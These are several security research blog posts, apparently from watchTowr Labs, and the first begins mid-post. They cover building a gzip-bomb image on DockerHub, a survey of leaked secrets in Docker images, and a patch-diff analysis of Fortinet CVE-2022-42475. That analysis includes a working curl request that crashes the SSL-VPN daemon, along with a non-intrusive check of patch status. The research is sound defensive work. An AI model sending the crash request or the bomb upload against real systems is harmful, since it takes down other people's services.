    "sha256:9358dad6bc6da9103d5c127dc2e88cbcf3dd855d8a48e3e7b7e1de282f87a27f"
]

Note the final layer's hash.

We can upload this file to the 'blob store' as before, which yields the hash of the manifest itself (in our case, fee9926cf943231119d363b65042138890ca9ad6299a75e6061aa97dade398d0). But DockerHub still won't recognise it as a manifest - we must perform one final step, which is a simple PUT to /v2/alizwatchtowr/foo/manifests/latest. This request uploads a manifest list, which specifies the hash of the manifest itself. It looks like this:

{
   "schemaVersion": 2,
   "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
   "config": {
      "mediaType": "application/vnd.docker.container.image.v1+json",
      "size": 1619,
      "digest": "sha256:1834ec0829375e72a44940b8f084cd02991736281d012396e1dc32ce9ea36e8d"
   },
   "layers": [
      {
         "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
         "size": 30426706,
         "digest": "sha256:2b55860d4c667a7200a0cb279aec26777df61e5d3530388f223ce7859d566e7a"
      },
      {
         "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
         "size": 1825,
         "digest": "sha256:1be66495afef80008912c98adc4db8bb6816376f8da430fae68779e0459566a2"
      }
   ]
}

We change the first digest to that of our manifest, and send it via an HTTP PUT.

{
   "schemaVersion": 2,
   "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
   "config": {
      "mediaType": "application/vnd.docker.container.image.v1+json",
      "size": 1619,
      "digest": "sha256:fee9926cf943231119d363b65042138890ca9ad6299a75e6061aa97dade398d0"
   },
   "layers": [
      {
         "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
         "size": 30426706,
         "digest": "sha256:2b55860d4c667a7200a0cb279aec26777df61e5d3530388f223ce7859d566e7a"
      },
      {
         "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
         "size": 1825,
         "digest": "sha256:1be66495afef80008912c98adc4db8bb6816376f8da430fae68779e0459566a2"
      }
   ]
}

Finally, our image is uploaded to DockerHub! Browsing to it shows the hash of the manifest list, and nothing seems to be awry:

But when we try to pull it, we are met with unusably slow decompression of 1TB of data. We have successfully pushed an object so large it cannot be pulled.

We could, if this was not enough, add more layers or add even larger payload data.

Since the API requires that we authenticate, the scope for HTTP-based shenanigans such as XSS reduced to almost zero. Storing arbitrary objects in an object blob store itself can hardly be called a vulnerability (although it may be useful to some attackers).

Bringing it all together

In this post, we've scrutinised Docker's concept of layered filesystems, learning how we can enumerate the layers associated with an image, and how to fetch them individually from DockerHub, without their dependencies. Given our new understanding, it is now possible for us to write an efficient file indexer for Docker images, fetching only layers we have not yet indexed, and ingesting only files we have not encountered before. This ability enables us to ingest the files contained within a Docker image without needing to shell out to the docker command at all.

While this comprehension may seem academic at first glance, it is actually a crucial part of the system we are designing in this series. As mentioned above, initial prototyping of this system would fetch containers simply by repeatedly executing docker pull, which would pull all of the layers referenced by the given container. Since these would be written to disk, a periodic prune was necessary to remove them. However, this often meant that base layers were fetched repeatedly, leading to unacceptably poor performance and network load - preventing us from processing data at the scale we aspire to.

This new approach, however, enables us to process Docker layers individually, building up our view of containers in a much more structured way, with no duplication. With the significant boost in efficiency that this brings, we are able to fetch substantially more files from DockerHub, and thus build up a much more realistic view of the broader container landscape, ultimately resulting in more statistically reliable output.

We also took a brief jaunt into the file upload process, figuring out how to upload filesystem layers to DockerHub, and how to modify manifests, culminating in a gzip bomb, which (while useless) is an interesting curiosity. One wonders how effective a C2 network built upon DockerHub objects would be, since very few organisations would scrutinize this traffic.

Next week, we'll put our newfound knowledge about Docker's layered filesystem into practical use, discussing how we built a system capable of archiving, indexing, and examining such a large quantity of data for those all-important secrets. We'll outline general design and then delve into detail on specific topics, outlining difficulties we faced and sharing performance statistics. I hope you'll join us!

Examining this kind of 'hidden' attack surface is exactly what we do here at watchTowr. We believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please get in touch.

watchTowr Labs - Blog
"I don't need no zero-dayz" - Docker Container Images (1/4)Aliz Hammond
3 February 2023 at 08:25

"I don't need no zero-dayz" - Docker Container Images (1/4)

watchTowr Labs - Blog

By: Aliz Hammond

3 February 2023 at 08:25

"I don't need no zero-dayz" - Docker Container Images (1/4)

This post is the first part of a series on our recent adventures into DockerHub. You may be interested in the next instalments, which are:

Here at watchTowr, we love delving into 'forgotten' attack surfaces - resources that are exposed to the public, forgotten about, and give us all the information we need to gain initial access to an organisation.

The more dark corners of an attack surface that we can see, the more we fulfil our ultimate goal - helping our clients understand how they could be compromised today.

Today, I'd like to share some research that we recently undertook in order to assess the scale of one such oft-neglected attack surface - that is exposed by public Docker container images.

Through the watchTowr Platform's analysis of attack surfaces, we frequently discover sensitive data in Docker container images. In order to more formally assess the scale of this problem, and also to raise awareness of the associated veiled attack surface, we decided to embark on a research project searching a representative portion of available DockerHub images for sensitive information. Our expectation at this point was that we would discover access keys for small-scale applications, but we soon found that even large organisations were not without weaknesses in this area.

In this post, the first of a four-part series, we will discuss an overview of our findings at a high level. Subsequent posts will explain our technical methodology in more detail, and offer additional insight into the problems we encountered during the research - as well as observations on the distribution of sensitive data and recommendations to those who wish to avoid their own inadvertent exposure.

What Are Docker Containers?

Docker containers, favoured by application developers and DevOps teams worldwide, are used to package an entire system configuration into a single 'container', making it easy for end-users to start an application without having to configure their own system appropriately. For example, a developer who produces forum software could make such a container available to the wider public, containing not only their forum software, but also a database and web server, plus the appropriate configuration files to enable the application to "just work" out-of-the-box.

These 'containers' are usually stored in a 'registry', which can be configured to allow access only to an organisation's employees, or to the wider public. One such registry, 'DockerHub', is operated by the developers of Docker themselves, and is designed to allow the public to easily share their images, in a similar manner to how GitHub allows developers to easily share their code.

When developing such a 'container', however, there is a risk that sensitive data is inadvertently included in the configuration of a container published publicly. This results in the wider public being able to access such sensitive data, and use it for nefarious means, which can often have a significant impact (discussed below).

One example could be in the hypothetical forum software I mention above. If the database is configured to allow remote connections, and it is also configured with a hardcoded password, then an attacker could extract the password from the container image and use it to access any instance of the software built from that container image.

Everyone Gets A Secret! - Over 2,000,000 Secrets

At this point it is important to note the inherent difficulty in appropriating or validating secret data held by organisations with which we are not involved. For example, we found some data claiming to be a list of passwords for email accounts - but it is impossible for us to verify their validity without simply using them to log in, which would cross ethical and legal boundaries. Also difficult to classify are API tokens, which are strings similar to passwords, but with varying levels of permissions - given an API token, it is impossible for us to determine if it is a token holding powerful privileges, or a low-privilege token designed to be made public.

While we've taken every effort to remove obvious false positives (for example, we saw secret keys such as "NotARealKey", which are obviously bogus), some may remain in the dataset. For purposes of calibration, however, here is an example file which we consider valid:

{
        "cf_email": "<redacted>",",
        "cf_apikey": "<redacted>",
        "cf_org": "<redacted>Prod",
        "cf_space": "<redacted>prodspace2",
        "cf_broker_memory": "512M",

        "devex": {
                "ace_app_space": "opsconsole",
                "ace_app_suffix": "dev",
                "bssr_client_id": "<redacted>",
                "bssr_client_secret": "<redacted>",
                "node_env": "production",
                "session_key": "opsConsole.sid",
                "session_secret": "<redacted>",
                "slack_endpoint": "<TBD>",
                "uaa_callback_url": "<redacted>",
                "uaa_client_id": "<redacted>",
                "uaa_client_secret": "<redacted>"
        },
        "CLOUDANT_USER": "<redacted>",
        "CLOUDANT_PASSWORD": "<redacted>",
        "BLUEMIX_CLOUDANT_DB_NAME": "<redacted>",
        "TERRAFORM_CLOUDANT_DB_NAME": "<redacted>",
        "CLOUDANT_DB_URL": "<redacted>",
        "BLUEMIX_SPACE": "<redacted>",
        "UAA_CLIENT_SECRET": "<redacted>",
        "UAA_CALLBACK": ""<redacted>",",
        "SESSION_CACHE": "Redis-cam-ui",
        "TERRAFORM_PLUGIN_ENDPOINTURL": "<redacted>/api",
        "CAM_TOKEN":"<redacted>",
        "A8_REGISTRY_TOKEN": "<redacted>",
        "A8_CONTROLLER_TOKEN": "<redacted>",
        "REDIS_HOST": "<redacted>",
        "REDIS_PASSWORD": "<redacted>",
        "REDIS_PORT": "<redacted>",
        "SRE_SLACK_WEBHOOK_URI":"https://hooks.slack.com/services/<redacted>
        ",
}

Looking at this file, we can estimate that 'cf' represents CloudFare, the wildly popular CDN. We also note credentials for "Terraform", which is a system used by DevOps engineers for provisioning entire 'fleets' of servers to build entire environments. Furthermore, there are connections to Slack, the popular business chat application, and other services. It is easy to imagine a scenario in which these credentials are leveraged to deploy ransomware across a large environment, resulting in considerable loss of business and revenue, especially given the presence of the string 'prodspace2', suggesting that this file contains secrets for a production environment.

This file is particularly interesting as it belongs to a fortune-10 organisation, who are well-funded and motivated to secure their environments - we hope. Our initial expectations of finding 'low-hanging fruit' are clearly, slightly exceeded here.

Our initial findings located a vast amount of such secrets - around 2.5 million across a small-subset of container images reviewed from DockerHub - roughly 22,000 images representing roughly 0.4% of all available container images.

Let's drill down into this huge number and find the most interesting data.

150,000 Unique Secrets

While a naïve analysis of the dataset suggests over 2.5 million credentials, the watchTowr team quickly identified a large number of 'false positives' and pared this number down to slightly over 1.1 million. Many of these are duplicated, however, and removing these duplicated results reveals a core of 152,000 unique secrets, sourced from around 22,000 vulnerable Docker images.

We can further explore this dataset, breaking down our results and categorising by the service each secret applies to. This helps us suggest a more realistic assessment of the true risk that exposure entails.

The majority of the secrets, as you can see, are those for "generic" API endpoints. These typically enable applications to integrate with external services, such as Cloudfare or Terraform. While this category is interesting, remaining credentials have been categorised by the service they are associated with, which makes analysis much more useful. Let's put these "generic" results aside for now, and look more into the second-largest category - that of 'Cloud provider'.

Cloud Platform Access Keys - Cryptomining For Days

Once we set aside the 'generic' keys, we can see a large amount of credentials (around 23% of our total) categorised as being for a 'Cloud Provider'. These services, such as Amazon's ubiquitous 'AWS' and Google's 'GCP', enable developers and devops teams to virtualise their compute resources, often running the entire companies infrastructure from one cloud account.

As mentioned before, these credentials are typically generated by developers and assigned a level of privilege appropriate to their intended use-case, with some keys designed for public consumption and some used for sensitive operations. While it is impossible for us to determine the privileges associated with each key without crossing ethical and legal boundaries, it is difficult to overstate the risk that these keys can potentially represent. Even on an unused account, a malicious actor can use these keys to run cloud services to mine cryptocurrency - an activity popular enough that it has spawned public tools such as the Denonia crypto miner to ease the process. With an active account, however, things are even worse, as a powerful cloud token allows access to virtual servers, S3 buckets, virtual networks, VPN traffic, and other resources.

History shows us of the potential consequences of a cloud provider credential leak. Back in 2021, AWS accounts belonging to Ubiquiti were allegedly leaked by a disgruntled ex-employee, resulting in an extortion attempt (more info here) and a significant drop in stock price, highlighted in the red box below:

This is not an isolated incident - those with longer memories may recall the 2020 story of a Cisco ex-employee who maliciously deleted ~450 virtual servers from Cisco's AWS account, resulting in one million USD of customer refunds and a further 1.4 million USD in employee time (more info here) as Cisco scrambled to recover during a two-week period. Clearly, the dangers of an exposed and compromised cloud provider account are significant and well-known.

🗨️

Over 30,000 unique access keys for Amazon AWS were found

However, this was not reflected in our results. We found slightly over 30,000 unique AWS keys, a truly terrifying number (even though we expect a portion of these to be low-privilege tokens). Indeed, AWS keys alone form around 23% of the credentials we discovered.

Other cloud services were not absent from the data, either, as we also found almost 90 keys for the competing Google Compute Platform, as well as credentials for other services such as Alibaba Cloud. These keys allow a similar-scale breach via other cloud services.

We leave it to the reader's imagination and critical thinking as to the reason for the huge difference in the number of exposed keys per platform.

Payment Processing - Issuing All Of The Refunds

The keys for payment processors are often valued by attackers for obvious reasons - they often represent the ability to transfer funds, issuing refunds or making payments. Any single leaked credential of this type almost certainly spells disaster for the owner - yet we still found over a hundred instances of these tokens in our crawl.

These tokens are for a variety of services, but the most well-represented in our dataset is the payment processor 'Stripe', which is particularly popular for websites which wish to provide e-commerce abilities without handling card data directly. Stripe themselves comment on the power of these keys here:

Your secret API key can be used to make any API call on behalf of your account, such as creating a charge or performing a refund.

It seems obvious that the presence of these keys in our dataset is worrisome. What else do we have?

Social Media - Sending Tweets On Your Behalf

As shown in the graphic above, social media tokens are also prevalent in our haul, as 301 images contained at least one such access token. We estimate these to allow an adversary to post and manipulate an organisation's online presence. Around 10% of these tokens were for Facebook, while LinkedIn and Twitter were also popular. We also noted tokens for mass-email companies such as SendGrid and MailGun.

While a breach of an organisation's social media account may seem minor compared to a compromise of payments, it still represents a significant risk. Years of careful public relations can be undone quickly as customers lose faith in an organisation's security posture, or sensitive data may be recovered via the accounts 'Direct Messaging' feature. Often, attackers use compromised social media accounts to spread cryptocurrency scams for a quick payout (for an example, see here):

While often overlooked, the use of a compromised social media account to facilitate additional social engineering attacks inside an organisation should not be underestimated.

Related to social media, we found 67 images containing tokens for the popular business-oriented communication application Slack. These tokens may allow an attacker to disrupt communications and even read private messages sent and received by employees via the service. While it is tempting to doubt the severity of such a breach, there are historic examples of attackers leveraging Slack - the 2020 breach of Animal Jam involved compromised AWS credentials exposed via a breach of their Slack environment.

SSH

On a more technical note, we found 559 images (~2.5%) containing a cryptographic 'host' key pair, typically used to secure a 'Secure Shell' (or 'SSH' ) connection for encrypted communication. We were able to determine that a subset of these keys are in use by active, publicly accessible endpoints on the wider internet. More seriously, 189 images contained at least one authentication key - potentially allowing an attacker to authenticate and execute commands on the host. Historic breaches involving such keys include the 2016 breach of DataDog.

Other Secrets

Of all the users of the Internet, few are more concerned with security than users of cryptocurrency. Nevertheless, we discovered six Docker containers which held cryptocurrency wallets, allowing anyone to access funds and perform transfers. We even found a key for an "onion" hidden service, as used by the ToR project to communicate extremely sensitive information securely.

Finally, we noted a small number of Docker images which included credentials to further Docker registries, such as those owned privately by an organisation.

The only discernible barrier to finding more credentials in this dataset seemed to be the amount of time we were willing to invest in searching, which does not bode well for anyone.

The Dataset

Finally, it may help to provide a quick summary of the dataset, to give an idea of the scale of our research.

Over a period of around three weeks, we obtained the newest tag from 22,194 docker images, which we believe is around 0.4% of the total available repositories at the time of publishing. These images contain around 240 million files, of which approximately 32 million (around 3.8 TB) are unique in their contents.

🗨️

Our dataset spans almost 4TB of data in 32 million unique files, taken from over 22,000 docker images

We selected docker images randomly, and analyzed only their newest tag, in order to avoid a dataset skewed by a single container. For simplicity, we analyzed only Linux-based containers on the amd64 platform. We believe our sample to be representative of the broader DockerHub file collection.

We used Amazon EC2 for the project, using mostly t2.xlarge workers (more detail will follow in subsequent posts). Our total spend was under 2000 USD, which speaks to the accessibility of the data we collected - this sum is low enough that an adversary might expect to recoup it by monetising access to the resultant stolen data.

As you can imagine, locating sensitive information in such a large dataset is a technical challenge. We've taken every effort to remove false positives from the results we present here, but some may still remain - this topic will be discussed at length in a subsequent post. With some notable exceptions, it is impossible to verify if a secret is truly sensitive (for example, if a credential is valid) without actually trying to use it, which is not something we are able to do.

Summary

We're quite excited to share the methodology and further insights we gained from this research. To that end, we will be posting a series of weekly blog posts going into more technical detail around specific topics. Expect the following posts:

Next up, "Layer Cake: How Docker Handles Filesystem Access (2/4)" will go into detail about how Docker assembles filesystem images for containers, how these are stored on DockerHub, and how we can best archive them,
After this, "Learning To Crawl (For DockerHub Enthusiasts, Not Toddlers) (3/4)" will lay out a general overview of our archival process, and then dive into the specifics of how it operates,
And finally, "What Does This Key Open? - Detecting Secrets (4/4)" will talk about how we customised an open-source tool to crawl through the dataset and locate interesting information. We will go into detail about our findings, and end the series with some final thoughts on how to secure your environment.

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please get in touch.

watchTowr Labs - Blog
We're Out Of Titles For VPN Vulns - It's Not Funny Anymore (Fortinet CVE-2022-42475)Aliz Hammond
31 January 2023 at 09:50

We're Out Of Titles For VPN Vulns - It's Not Funny Anymore (Fortinet CVE-2022-42475)

watchTowr Labs - Blog

By: Aliz Hammond

31 January 2023 at 09:50

We're Out Of Titles For VPN Vulns - It's Not Funny Anymore (Fortinet CVE-2022-42475)

As part of our Continuous Automated Red Teaming and Attack Surface Management capabilities delivered through the watchTowr Platform, we analyse vulnerabilities in technology that are likely to be prevalent across the attack surfaces of our clients. This enables our ability to rapidly PoC and identify vulnerable systems across large attack surfaces.

You may have heard of the recent Fortinet SSL-VPN remote code execution vulnerability (or, more formally, 'CVE-2022-42475') being exploited by those pesky nation-state actors, and perhaps like us, you've been dying to understand the vulnerability in greater detail since the news of exploitation began - because well, it sounds exciting.

We'd like to insert a comment about the sad state of VPN appliance security here. Something about this being a repeated cycle across the VPN space, not specific to one particular vendor, but where we as an industry continue playing whack-a-mole for bugs straight out of the 90s and act shocked each time we see someone spraying their PoC across the Internet. Something like that. But with tact.

Naturally, though - we have a vested interest in understanding how to identify vulnerable appliances, and subsequently, exploit them - let's dive into our analysis, and see where it takes us...

Locating the bug

Fortinet's security advisory doesn't give us much to go by, in terms of exploitation:

Naturally, we resort to comparing the fixed and vulnerable versions of the firmware. This is made slightly more difficult due to two factors - firstly, Fortinet's decision to release other updates in the same patch, and secondly, the monolithic architecture of the target environment, which loads almost all user-space code from a single 66 MB init executable.

We used Zynamic's BinDiff tool, alongside the IDA Pro disassembler, and identified the following function had changed in an intriguing manner:

While most of the code is identical between the two versions, you can see that an extra ja ("jump if above") conditional branch has been added, along with a comparison against the constant 0x40000000. Interesting. I guess this function is as good a place to start as any!

One thing that often makes reverse engineering of patches, and in general this kind of work easier when working on embedded devices, is the frequent abundance of debug strings in the binary. Since the target market for network appliances is primarily concerned with uptime, enabling a remote engineer to diagnose and correct a problem is often more important than the vendor's preference for secrecy, and so error messages tend to be helpful and verbose. Indeed, if we examine the callers to this function, we can deduce its name - fsv_malloc:

Indeed, not only can we deduce the name of the function itself but also the caller - in this case, malloc_block. This will help us work out how this function is used, and figure out if this function really is involved with the fix for CVE-2022-42475.
If we examine the references to our newly-discovered malloc_block, we find a caller named sslvpn_ap_pcalloc. Since the CVE we're hunting for deals with the SSL VPN functionality, it seems likely that this is a good place to look for more clues.

A quick look at the code references to it reveals it is used in quite a few places - 96 - but some careful observation of the callers finds the most promising-sounding caller, named read_post_data. Judging by the name, this function handles HTTP POST data, which we would expect to originate from untrusted users - lets take a closer look.

The function is straightforward, and appears to read the Content-Length HTTP header, allocate a buffer via our sslvpn_ap_pcalloc, and then proceed to read the HTTP POST body into the newly-minted buffer. Interestingly, though, this function also differs between vulnerable and patched versions.

After carefully deciding which differences are unimportant, we are left with the following key difference (highlighted in a nice shade of pink):

A keen eye - perhaps belonging to a reader who has spotted this kind of vulnerability before - might pick out the difference. On the left, we have the vulnerable code, containing:

lea esi, [rax+1]
movsxd rsi, esi

While on the right is the patched version:

lea rsi, [rax+1]

What's the difference between these two blocks? Surely a teeny tiny difference like that couldn't spell a remote-root compromise... right?! Well...

Of casting and typing

The presence of the movsxd (or 'Move with Sign-eXtend.dword') opcode indicates that the compiler is promoting a signed value from a 32-bit dword into a signed 64-bit qword. In C, this might look like int64_t a = (int64_t)1L, for example. We can hazard a guess that the vulnerable code does this, and could perhaps resemble:

int32_t postDataSize = ...;
sslvpn_ap_pcalloc(.., postDataSize + 1);

Note that sslvpn_ap_pcalloc is declared as accepting a SIZE_T, which is a signed 64bit value, so the result of the addition is converted from an int32_t to an int64_t by way of sign extension.

The problem arises, however, when the POST data size is set to the largest value that an int32_t can hold (since it is signed, this is 0x7FFFFFFF). In this case, the code will perform a 32-bit addition between the size (0x7FFFFFFF) and the constant 0x00000001, arriving at the result 0x80000000. When interpreted as a signed value, this is the lowest number that a int32_t can hold, -2147483648. Since sslvpn_ap_pcalloc requires an int64_t, the compiler helpfully sign extends into the 64bit value 0xFFFFFFFF80000000. That's unexpected, but one could expect execution to continue without disaster, thinking that sslvpn_ap_pcalloc would interpret its argument as an extremely large unsigned integer, and simply fail the allocation. However, this is not the case. Time to delve into sslvpn_ap_pcalloc to explain why.

The function sslvpn_ap_pcalloc is what is commonly known as a pool allocator - instead of simply allocating memory from the underlying memory manager (such as malloc), it attempts to minimise heap fragmentation and the number of allocations by allocating a large amount of memory, of which parts are then granted by subsequent calls to sslvpn_ap_pcalloc. Here's some C code which represents sslvpn_ap_pcalloc :

struct pool
{
	struct heapChunk* info;
}

struct heapChunk
{
	int64_t endOfAllocation;
	heapChunk* previousChunk;
	void* nextFreeSpace;
	char data[];
}

char* sslvpn_ap_pcalloc(pool* myPool, int64_t requestedSize)
{
  char* result = NULL;
  if ( requestedSize > 0 )
  {
    // Align the requested size up to the nearest 8 bytes
    uint64_t alignedSize = (((requestedSize - 1) / 8 ) + 1) * 8;
    
    // Is there enough space left in the current pool chunk?
    if ( &info->nextFreeSpace[alignedSize] > endOfAllocation )
    {
      // There is not enough space left. We must allocate a new chunk.
      chunkSize = global_sizeOfNewChunks;
      if ( chunkSize < alignedSize )
        chunkSize = alignedSize;
        
      // Allocate our new pool chunk, which will hold multiple allocations
      chunkInfo* newChunk = malloc_block(chunkSize);

      // Link this new chunk into our list of chunks
      myPool->info->previousChunk = newChunk;
      myPool->info = newChunk;
      
      // Now we can allocate from our new pool chunk.
      result = myPool->info->nextFreeSpace;
      myPool->info->nextFreeSpace = &result[alignedSize];
    }
    else
    {
      result = myPool->info->nextFreeSpace;
      myPool->info->nextFreeSpace += alignedSize;
    }
  }
  return memset(result, 0, requestedSize);
}

You can see that the function accepts a pool*, which holds information about previous allocations. This is the buffer from which allocations are serviced. For example, the first call to sslvpn_ap_pcalloc might have a requestedSize of 0x10. In order to service the request, sslvpn_ap_pcalloc would instead allocate a larger chunk (global_sizeOfNewChunks, around 0x400 bytes). It would note this allocation in the pool, and then return the start of this newly-allocated chunk to the caller. However, during the next call to sslvpn_ap_pcalloc , this pool buffer would be examined, and if it had enough free space, the function would then return a buffer from the pool instead of needing to call malloc a second time.

Of particular note is the signed quality of the requestedSize argument, and how it is treated. We can see that this parameter is first rounded up to the nearest 8-byte boundary, and then the current pool info is checked to see if there is enough space remaining, here:

uint64_t alignedSize = (((requestedSize - 1) / 8 ) + 1) * 8;

if ( &info->nextFreeSpace[alignedSize] > endOfAllocation ) { ... }

Note that requestedSize is a signed variable. In our corner-case above, we've called the function with a requestedSize of 0xFFFFFFFF80000000, or -2147483648 in decimal. This causes the condition to be evaluated as false - conceptually, we are asking if the free space pointer minus 2147483648 is beyond the bounds of the allocated memory, which it usually is not.

Since the condition is evaluated as false, control passes as if the pool chunk has enough space remaining for the extra data, and then the chunk is initialised:

result = myPool->info->nextFreeSpace;
myPool->info->nextFreeSpace += alignedSize;
..
return memset(result, 0, requestedSize);

The memset statement dutifully attempts to set 0xFFFFFFFF80000000 bytes, starting at the heap chunk, which invariably causes the hosting process to crash.

That's a lot of theory - but does it work in practice?

The crash

Testing our theory is surprisingly simple - all we must do is send a HTTP request with a Content-Length header set to 2147483647 (ie, 0x7FFFFFFF) to the SSL VPN process. The /remote/login endpoint is unauthenticated, so let's give it a go:

curl -v --insecure -H "Content-Length: 2147483647" --data 1 https://example.com:1234/remote/login
*   Trying example:1234...
* Connected to example.com (example) port 1234 (#0)
* schannel: disabled automatic use of client certificate
* ALPN: offers http/1.1
* ALPN: server did not agree on a protocol. Uses default.
> POST /remote/login HTTP/1.1
> Host: example.com:1234
> User-Agent: curl/7.83.1
> Accept: */*
> Content-Length: 2147483647
> Content-Type: application/x-www-form-urlencoded
>
* schannel: server closed abruptly (missing close_notify)
* Closing connection 0
* schannel: shutting down SSL/TLS connection with example.com port 1234
curl: (56) Failure when receiving data from the peer

Taking a look at the system logs, we can indeed see that the VPN process has died:

Although debugging facilities are sparse, on such an embedded device, fetching the debug logs does yield a little more information in the form of a register and stack trace at crash time.

7: <00376> firmware FortiGate-VM64-AWS v7.2.2,build1255b1255,220930 (GA.F) 
8: (Release)
9: <00376> application sslvpnd
10: <00376> *** signal 11 (Segmentation fault) received ***
11: <00376> Register dump:
12: <00376> RAX: 0000000000000000   RBX: ffffffff80000000
13: <00376> RCX: ffffffff7ff3b2c8   RDX: 00007f0cb74d22c8
14: <00376> R08: 00007f0cb74d22c8   R09: 0000000000000000
15: <00376> R10: 0000000000000000   R11: 0000000000000246
16: <00376> R12: ffffffff80000000   R13: 00007f0cb8149800
17: <00376> R14: 0000000000000000   R15: 00007f0cb742ad78
18: <00376> RSI: 0000000000000000   RDI: 00007f0cb7597000
19: <00376> RBP: 00007fff69b4bfa0   RSP: 00007fff69b4bf78
20: <00376> RIP: 00007f0cbd34876d   EFLAGS: 0000000000010286
21: <00376> CS:  0033   FS: 0000   GS: 0000
22: <00376> Trap: 000000000000000e   Error: 0000000000000007
23: <00376> OldMask: 0000000000000000
24: <00376> CR2: 00007f0cb7597000
25: <00376> stack: 0x7fff69b4bf78 - 0x7fff69b4eeb0 
26: <00376> Backtrace:
27: <00376> [0x7f0cbd34876d] => /usr/lib/x86_64-linux-gnu/libc.so.6  liboffset 
28: 0015a76d (memset)
29: <00376> [0x01655589] => /bin/sslvpnd (sslvpn_ap_pcalloc)
30: <00376> [0x0178ca72] => /bin/sslvpnd (read_post_data)
31: <00376> [0x0178643d] => /bin/sslvpnd  
32: <00376> [0x01787af0] => /bin/sslvpnd  
33: <00376> [0x01787bce] => /bin/sslvpnd  
34: <00376> [0x017880e1] => /bin/sslvpnd (mainLoop)
35: <00376> [0x0178938c] => /bin/sslvpnd (slave_main)
36: <00376> [0x0178a712] => /bin/sslvpnd (sslvpnd_main)
37: <00376> [0x00448ddf] => /bin/sslvpnd  
38: <00376> [0x00451e9a] => /bin/sslvpnd  
39: <00376> [0x0044e9fc] => /bin/sslvpnd (run_initentry)
40: <00376> [0x00451108] => /bin/sslvpnd (initd_mainloop) 
41: <00376> [0x00451a31] => /bin/sslvpnd  
42: <00376> [0x7f0cbd211deb] => /usr/lib/x86_64-linux-gnu/libc.so.6 
43: (__libc_start_main+0x000000eb) liboffset 00023deb
44: <00376> [0x00443c7a] => /bin/sslvpnd  
45: <00376> fortidev 6.0.1.0005
46: the killed daemon is /bin/sslvpnd: status=0xb

I've gone ahead and annotated the stack trace with memset, sslvpn_ap_pcalloc, and read_post_data for your convenience.

The arguments passed to memset are still present in the register dump, in rdx and rdi, as are a few registers used by the calling sslvpn_ap_pcalloc. We can see the size of the data we're trying to clear - 0xFFFFFFFF80000000 bytes - as well as the base of the buffer we're setting, at 0x00007f0cb74d22c8.

Okay, so that's useful to us as defenders - we can verify that a system is patched - but only in a very limited way.

We don't want to start crashing Fortinet appliances in production just to check if they are patched or not. Maybe there's a less intrusive way to check?

A more gentle touch

It turns out, yes, there is.

If you recall, the initial difference that piqued our interest was a change to the memory allocator, which will now reject HTTP requests with a Content-Length of over 0x40000000 bytes. There are other such checks added, presumably to add extra layers of safety to the large codebase. One such check will reject POST attempts which contain a payload of more than 1048576 (0x10000) bytes, responding with a HTTP "413 Request Entity Too Large" message instead of waiting for the transfer of the payload data.

This can be used to check that appliances are patched without risk of destabilising them, since even vulnerable systems are able to allocate a POST buffer of 0x10000 bytes, far beneath the troublesome value of 0x7fffffff. We don't even need to write any code - we can just use cURL:

c:\code\hashcat-6.2.6>curl --max-time 5 -v --insecure -H "Content-Length: 1048577" --data 1 https://example.com:1234/remote/login
*   Trying example.com:1234...
* Connected to example.com (example) port 1234 (#0)
* schannel: disabled automatic use of client certificate
* ALPN: offers http/1.1
* ALPN: server did not agree on a protocol. Uses default.
> POST /remote/login HTTP/1.1
> Host: example.com:1234
> User-Agent: curl/7.83.1
> Accept: */*
> Content-Length: 1048577
> Content-Type: application/x-www-form-urlencoded
>
* Operation timed out after 5017 milliseconds with 0 bytes received
* Closing connection 0
* schannel: shutting down SSL/TLS connection with example.com port 1234
curl: (28) Operation timed out after 5017 milliseconds with 0 bytes received

Contrast this with the response seen from an appliance which has been upgraded to v7.2.3:

curl --max-time 5 -v --insecure -H "Content-Length: 1048577" --data 1 https://example.com:1234/remote/login
*   Trying example.com:1234...
* Connected to example.com (example) port 1234 (#0)
* schannel: disabled automatic use of client certificate
* ALPN: offers http/1.1
* ALPN: server did not agree on a protocol. Uses default.
> POST /remote/login HTTP/1.1
> Host: example.com:1234
> User-Agent: curl/7.83.1
> Accept: */*
> Content-Length: 1048577
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 413 Request Entity Too Large
(other output omitted)

Summary

This is definitely not the first buggy VPN appliance we've seen and almost certainly won't be the last. Indeed, while searching for this bug, we accidentally found another bug - fortunately one limited to a crash of the VPN process via a null pointer dereference. Shrug.

Needless to say, it does not bode well for an appliance's security if a researcher is able to discover crashes by accident. VPN appliances are in a particularly precarious position on the network since they must be exposed to hostile traffic almost as a pre-requisite for existing. We at watchTowr consider it likely that similar bugs in Fortinet hardware - and other hardware in this class - will continue to surface as time goes by.

We would suggest that it's a very safe bet ;-)

Of course, one critical factor that can help determine real-world fallout from such bugs is the vendor's response - in this case, Fortinet. We were especially frustrated by Fortinet's posture in this regard, as they refused to release details of the bug once a patch was available, even though it was being actively exploited by attackers. We believe this stance weakens the security posture of Fortinet's customer base, making it more difficult to detect attacks and to determine with certainty that their devices are not affected.

This might sound trivial to those that are living in youthful freshness - but in an enterprise with 50,000 systems connected to the Internet - working out even whether you have a particular Fortinet device is alone not trivial, let alone just saying 'patch, duh?'.

While this is a very simple bug in concept, there are a few factors that make it more difficult for researchers to pinpoint the exact issue, even when provided with Fortinet's "advisory". Part of this is inherent to the architecture of the appliance; having every binary compiled into a large init process (as I mentioned above) can make it more difficult for a reverse engineer to map dependencies and figure out what's going on.

Further, attempts to 'diff' the firmware and look for the code affected by the patch are hampered by Fortinet's approach of bundling multiple unrelated improvements and changes along with the patch. It is impossible to patch a Fortinet appliance without also applying changes to a large amount of unrelated functionality (and dealing with the associated 'known issues'). One imagines an overworked network administrator trying to weigh their chances - do they apply the patch, and suffer the potential consequences, or stay on their current version and risk being breached?

